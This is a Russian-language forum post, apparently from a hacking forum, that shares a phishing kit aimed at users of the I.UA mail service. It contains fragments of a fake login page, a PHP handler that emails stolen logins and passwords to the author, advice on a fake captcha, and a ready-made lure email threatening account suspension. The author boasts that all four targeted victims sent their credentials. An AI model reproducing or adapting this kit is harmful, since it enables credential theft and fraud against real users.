В общем, ниже выложен фейк страница авторизации I.UA
Сразу оговорюсь что точно такая же страница в реале существует и на нее перекидывает каждого пользователя с кривыми руками, тоесть если пользователь на главной странице ввел неправильно пасс или логин, что на мой взгляд заметно притупливает бдительность рядового юзера. Мой фейк не паленый, так как отправлял я письмо только 4 юзерам, и к стати все 4 юзера благополучно отправили свои логины и пассы мне на почту. А теперь о плохом, работает мой фейк только на хосте где доступна опция phpsandmail, обычно на бесплатном хосте такая опция недоступна, по крайней мере я такой хост не нашел.
Вот непосредственно сама html страница.
code:
Паспорт I.UA
Логин:
Логин — короткое имя ящика I.UA (проверяется автоматически), или полный email адрес.
Пароль:
Вот файл php, называтся он должен mail.php если назовете подругому то и в html странице нужно поменять. незабудьте указать мыло на которое должно приходить письмо с пассами и логинами
code:
passport i.ua
Спасибо, вы успешно подтвердили вашу учетную запись!";
}
?>
Похожую капчу не нашел, пришлось просто влепить картинку, наиболее разборчивую, что б юзеру не пришло в голову нажать обновить.
Ну и ниже прицеплены картинки которые нужны для правдоподобности фейка, хотя можно просто прописать ссылки на оригинальные, так наверное будет лучше.
письмо с ссылкой на фейк
Уважаемый пользователь!
Пожалуйста, подтвердите Вашу учетную запись.
В связи с участившимися случаями массовой рассылки сообщений рекламного характера (SPAM), команда I.UA будет вынуждена приостановить обслуживание неподтвержденные учетные записи.
Для подтверждения учетной записи мыло жертвы перейдите по ссылке: Пожалуйста, подтвердите Вашу учетную запись
--